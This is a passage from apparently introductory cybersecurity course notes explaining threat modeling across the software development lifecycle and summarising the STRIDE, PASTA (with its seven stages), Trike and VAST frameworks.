successes they had. They also record any lessons learned, so they can inform how they
approach future threat models.

Ideally, threat modeling should be performed before, during, and after an application is
developed.

Threat modeling should be incorporated at every stage of the software development lifecycle,
or SDLC.

Common frameworks

When performing threat modeling, there are multiple methods that can be used, such as:

- STRIDE
- PASTA
- Trike
- VAST

Organizations might use any one of these to gather intelligence and make decisions to
improve their security posture. Ultimately, the “right” model depends on the situation and the
types of risks an application might face.

STRIDE

STRIDE is a threat-modeling framework developed by Microsoft. It's commonly used to
identify vulnerabilities in six specific attack vectors. The acronym represents each of these
vectors: spoofing, tampering, repudiation, information disclosure, denial of service, and
elevation of privilege.

PASTA

PASTA is a popular threat modeling framework that's used across many industries. PASTA is short for
Process for Attack Simulation and Threat Analysis. It is a risk-centric threat modeling process
developed by two OWASP leaders and supported by a cybersecurity firm called VerSprite. There are
seven stages of the PASTA framework.

1. Stage one of the PASTA threat model framework is to define business and security
objectives.

2. Stage two of the PASTA framework is to define the technical scope.

3. At stage three of PASTA, the team's job is to decompose the application. This normally
means working with the application developers to produce a data flow diagram. A diagram
like this will show how data gets from a user's device to the company's database.

4. Stage four of PASTA is to perform a threat analysis.

5. Stage five of PASTA is performing a vulnerability analysis. In this stage, the team more
deeply investigates potential vulnerabilities by considering the root of the problem.

6. Next is stage six of PASTA, where the team conducts attack modeling. This is where the
team tests the vulnerabilities that were analyzed in stage five by simulating attacks. The team
does this by creating an attack tree, which looks like a flow chart.

7. Stage seven of PASTA is to analyze risk and impact. Here, the team assembles all the
information they've collected in stages one through six. By this stage, the team is in a position
to make informed risk management recommendations to business stakeholders that align
with their goals.

Trike

Trike is an open source methodology and tool that takes a security-centric approach to threat
modeling. It's commonly used to focus on security permissions, application use cases,
privilege models, and other elements that support a secure environment.

VAST

The Visual, Agile, and Simple Threat (VAST) Modeling framework is part of an automated
threat-modeling platform called ThreatModeler®. Many security teams opt to use VAST as a
way of automating and streamlining their threat modeling assessments.
